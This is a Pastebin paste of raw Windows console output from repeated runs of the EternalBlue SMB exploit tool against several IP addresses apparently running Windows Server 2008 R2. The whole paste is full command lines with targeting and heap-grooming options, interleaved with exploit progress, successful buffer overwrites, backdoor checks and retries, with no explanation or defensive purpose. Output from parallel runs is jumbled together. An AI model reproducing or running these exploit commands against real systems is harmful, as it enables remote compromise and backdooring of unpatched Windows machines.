API tools faq
paste
Advertisement
Guest User

CMD

a guest
Oct 21st, 2017
286
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.01 KB | None | 0 0
raw download clone embed print report
  1. --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --Ver
  2. ifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 1.txt
  3. .) ..
  4. .......[*] Connecting to target for exploitation.
  5. [+] Connection established for exploitation.
  6.  
  7. .C:\Windows\Setup\fou1>.[*] Pinging backdoor...
  8. . [+] Backdoor not installed, game on.
  9. [*] Target OS selected valid for OS indicated by SMB reply
  10. ([*] CORE raw buffer dump (52 bytes):
  11. 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
  12. .0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
  13. 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
  14. 0x00000030 6b 20 31 00 k 1.
  15. call.[*] Building exploit buffer
  16. . start /b Eternalblue-2.2.0.exe --TargetIp 127.83.19.112 --Target WIN72K8R2 --D
  17. aveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --Verify
  18. Backdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 1.txt [*]
  19. Sending all but last fragment of exploit packet
  20. ..) ...
  21. ...............DONE.
  22. [*] Sending SMB Echo request
  23. [*] Good reply from SMB Echo request
  24. DONE.
  25. [*] Starting non-paged pool grooming
  26. [+] Sending SMBv2 buffers
  27. .......[*] Sending SMB Echo request
  28. .
  29. [*] Good reply from SMB Echo request
  30. [*] Starting non-paged pool grooming
  31. .....C:\Windows\Setup\fou1> [+] Sending SMBv2 buffers
  32. (DONE.
  33. . [+] Sending large SMBv1 buffer..call.. start /b Eternalblue-2.2.0.exe --Tar
  34. getIp 127.83.19.90 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --Ta
  35. rgetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --
  36. GroomAllocations 12 --OutConfig 1.txt .DONE.
  37. . [+] Sending final SMBv2 buffers.) ....
  38. .
  39. C:\Windows\Setup\fou1>(call start /b Eternalblue-2.2.0.exe --TargetIp 127.83.19.
  40. 94 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --V
  41. erifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations
  42. 12 --OutConfig 1.txt ) [*] Connecting to target for exploitation.
  43. [+] Connection established for exploitation.
  44. [*] Pinging backdoor...
  45. [+] Backdoor not installed, game on.
  46. [*] Target OS selected valid for OS indicated by SMB reply
  47. [*] CORE raw buffer dump (52 bytes):
  48. 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
  49. 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
  50. 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
  51. 0x00000030 6b 20 31 00 k 1.
  52. [*] Building exploit buffer
  53. [*] Sending all but last fragment of exploit packet
  54. ..
  55. ...........[-] Error sending transaction packet
  56. [+] CORE terminated with status code 0xdf5d000c
  57.  
  58. C:\Windows\Setup\fou1>[*] Connecting to target for exploitation.
  59. [+] Connection established for exploitation.
  60. (call start /b Eternalblue-2.2.0.exe --TargetIp 127.83.19.110 --Target WIN72K8R2
  61. --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --Ve
  62. rifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 1.txt
  63. )
  64. [*] Pinging backdoor...
  65. [+] Backdoor not installed, game on.
  66. [*] Target OS selected valid for OS indicated by SMB reply
  67. [*] CORE raw buffer dump (52 bytes):
  68. 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
  69. 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
  70. 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
  71. 0x00000030 6b 20 31 00 k 1.
  72. [*] Building exploit buffer
  73. [*] Sending all but last fragment of exploit packet
  74. ................DONE.
  75. [*] Sending SMB Echo request
  76. [*] Good reply from SMB Echo request
  77. [*] Starting non-paged pool grooming
  78. [+] Sending SMBv2 buffers
  79. ...
  80. C:\Windows\Setup\fou1>(call start /b Eternalblue-2.2.0.exe --TargetIp 127.83.19.
  81. 116 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --
  82. VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocation
  83. s 12 --OutConfig 1.txt )
  84.  
  85. C:\Windows\Setup\fou1>(call start /b Eternalblue-2.2.0.exe --TargetIp 127.83.19.
  86. 120 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --
  87. VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocation
  88. s 12 --OutConfig 1.txt )
  89. [*] Connecting to target for exploitation.
  90. [+] Connection established for exploitation.
  91. [*] Pinging backdoor...
  92. [*] Connecting to target for exploitation.
  93. DONE.
  94. [+] Backdoor not installed, game on.
  95. [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
  96. [*] Target OS selected valid for OS indicated by SMB reply
  97. [*] Sending SMB Echo request
  98. [*] CORE raw buffer dump (52 bytes):
  99. [+] Connection established for exploitation.
  100. [-] ERROR sending SMB Echo - 0xFFFFFFF9
  101. 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
  102. [*] Pinging backdoor...
  103. [+] CORE terminated with status code 0xdf5d000c
  104. 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
  105. [+] Backdoor not installed, game on.
  106. 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
  107. [*] Target OS selected valid for OS indicated by SMB reply
  108. 0x00000030 6b 20 31 00 k 1.
  109. [*] CORE raw buffer dump (52 bytes):
  110. [*] Connecting to target for exploitation.
  111. 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
  112. 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
  113. [+] Connection established for exploitation.
  114. 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
  115. [*] Building exploit buffer
  116. [*] Pinging backdoor...
  117. 0x00000030 6b 20 31 00 k 1.
  118. [*] Sending all but last fragment of exploit packet
  119. [*] Building exploit buffer
  120. .[*] Sending all but last fragment of exploit packet
  121. ...............................DONE.
  122. DONE.
  123. [*] Sending SMB Echo request
  124. [*] Sending SMB Echo request
  125. [*] Good reply from SMB Echo request
  126. [*] Good reply from SMB Echo request
  127. [*] Starting non-paged pool grooming
  128. [*] Starting non-paged pool grooming
  129. [+] Sending SMBv2 buffers
  130. [+] Sending SMBv2 buffers
  131. ............. [+] Backdoor not installed, game on.
  132. [*] Target OS selected valid for OS indicated by SMB reply
  133. [*] CORE raw buffer dump (52 bytes):
  134. 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
  135. 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
  136. 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
  137. 0x00000030 6b 20 31 00 k 1.
  138. [*] Building exploit buffer
  139. [*] Sending all but last fragment of exploit packet
  140. ..DONE.
  141. . [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
  142. .[*] Sending SMB Echo request
  143. .[-] ERROR sending SMB Echo - 0xFFFFFFF9
  144. .[+] CORE terminated with status code 0xdf5d000c
  145. ..........DONE.
  146. [*] Sending SMB Echo request
  147. [*] Good reply from SMB Echo request
  148. [*] Starting non-paged pool grooming
  149. [+] Sending SMBv2 buffers
  150. ......DONE.
  151. [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
  152. [*] Sending SMB Echo request
  153. [-] ERROR sending SMB Echo - 0xFFFFFFF9
  154. [+] CORE terminated with status code 0xdf5d000c
  155. [*] Connecting to target for exploitation.
  156. [+] Connection established for exploitation.
  157. [*] Pinging backdoor...
  158. [+] Backdoor not installed, game on.
  159. [*] Target OS selected valid for OS indicated by SMB reply
  160. [*] Connecting to target for exploitation.
  161. [*] CORE raw buffer dump (52 bytes):
  162. 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
  163. 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
  164. 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
  165. 0x00000030 6b 20 31 00 k 1.
  166. [*] Building exploit buffer
  167. [*] Sending all but last fragment of exploit packet
  168. ................DONE.
  169. [*] Sending SMB Echo request
  170. [*] Good reply from SMB Echo request
  171. [*] Starting non-paged pool grooming
  172. [+] Connection established for exploitation.
  173. [+] Sending SMBv2 buffers
  174. .[*] Pinging backdoor...
  175. .. [+] Backdoor not installed, game on.
  176. [*] Target OS selected valid for OS indicated by SMB reply
  177. [*] CORE raw buffer dump (52 bytes):
  178. 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
  179. 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
  180. 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
  181. 0x00000030 6b 20 31 00 k 1.
  182. [*] Building exploit buffer
  183. [*] Sending all but last fragment of exploit packet
  184. ................DONE.
  185. [*] Sending SMB Echo request
  186. [*] Good reply from SMB Echo request
  187. [*] Starting non-paged pool grooming
  188. [+] Sending SMBv2 buffers
  189. .............DONE.
  190. [+] Sending large SMBv1 buffer..DONE.
  191. [+] Sending final SMBv2 buffers......DONE.
  192. [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
  193. [*] Sending SMB Echo request
  194. [-] ERROR sending SMB Echo - 0xFFFFFFF9
  195. [+] CORE terminated with status code 0xdf5d000c
  196. DONE.
  197. [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
  198. [*] Sending SMB Echo request
  199. [-] ERROR sending SMB Echo - 0xFFFFFFF9
  200. [+] CORE terminated with status code 0xdf5d000c
  201. DONE.
  202. [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
  203. DONE.
  204. [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
  205. [*] Sending SMB Echo request
  206. [-] ERROR sending SMB Echo - 0xFFFFFFF9
  207. [*] Sending SMB Echo request
  208. [-] ERROR sending SMB Echo - 0xFFFFFFF9
  209. [+] CORE terminated with status code 0xdf5d000c
  210. [+] CORE terminated with status code 0xdf5d000c
  211. DONE.
  212. [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
  213. [*] Sending SMB Echo request
  214. [-] ERROR sending SMB Echo - 0xFFFFFFF9
  215. [+] CORE terminated with status code 0xdf5d000c
  216. DONE.
  217. [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
  218. [*] Sending SMB Echo request
  219. [-] ERROR sending SMB Echo - 0xFFFFFFF9
  220. [+] CORE terminated with status code 0xdf5d000c
  221. DONE.
  222. [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
  223. [*] Sending SMB Echo request
  224. [*] Good reply from SMB Echo request
  225. [*] Sending last fragment of exploit packet!
  226. DONE.
  227. [*] Receiving response from exploit packet
  228. [+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
  229. [*] Sending egg to corrupted connection.
  230. [*] Triggering free of corrupted buffer.
  231. [-] Error getting output back from Core; aborting...
  232. [-] Error getting output back from Core; aborting...
  233. [-] Error getting output back from Core; aborting...
  234. [-] Error getting output back from Core; aborting...
  235. [-] Error getting output back from Core; aborting...
  236. [-] Error getting output back from Core; aborting...
  237. [-] Error getting output back from Core; aborting...
  238. [-] Error getting output back from Core; aborting...
  239. [-] Error getting output back from Core; aborting...
  240. [-] Error getting output back from Core; aborting...
  241. [-] Error getting output back from Core; aborting...
  242. [*] Pinging backdoor...
  243. [+] Backdoor NOT installed
  244. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  245. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  246. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  247. [*] Trying again with 17 Groom Allocations
  248. [*] Connecting to target for exploitation.
  249. [+] Connection established for exploitation.
  250. [*] Pinging backdoor...
  251. [+] Backdoor not installed, game on.
  252. [*] Target OS selected valid for OS indicated by SMB reply
  253. [*] CORE raw buffer dump (52 bytes):
  254. 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
  255. 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
  256. 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
  257. 0x00000030 6b 20 31 00 k 1.
  258. [*] Building exploit buffer
  259. [*] Sending all but last fragment of exploit packet
  260. ................DONE.
  261. [*] Sending SMB Echo request
  262. [*] Good reply from SMB Echo request
  263. [*] Starting non-paged pool grooming
  264. [+] Sending SMBv2 buffers
  265. ............DONE.
  266. .DONE.
  267. [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
  268. [*] Sending SMB Echo request
  269. [*] Good reply from SMB Echo request
  270. [*] Sending last fragment of exploit packet!
  271. DONE.
  272. [*] Receiving response from exploit packet
  273. [+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
  274. [*] Sending egg to corrupted connection.
  275. [*] Triggering free of corrupted buffer.
  276. [*] Pinging backdoor...
  277. [+] Backdoor NOT installed
  278. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  279. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  280. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  281. [*] Trying again with 22 Groom Allocations
  282. [*] Connecting to target for exploitation.
  283. [-] Error getting output back from Core; aborting...
  284. [+] Connection established for exploitation.
  285. [*] Pinging backdoor...
  286. [+] Backdoor not installed, game on.
  287. [*] Target OS selected valid for OS indicated by SMB reply
  288. [*] CORE raw buffer dump (52 bytes):
  289. 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
  290. 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
  291. 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
  292. 0x00000030 6b 20 31 00 k 1.
  293. [*] Building exploit buffer
  294. [*] Sending all but last fragment of exploit packet
  295. ................DONE.
  296. [*] Sending SMB Echo request
  297. [*] Good reply from SMB Echo request
  298. [*] Starting non-paged pool grooming
  299. [+] Sending SMBv2 buffers
  300. ....
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!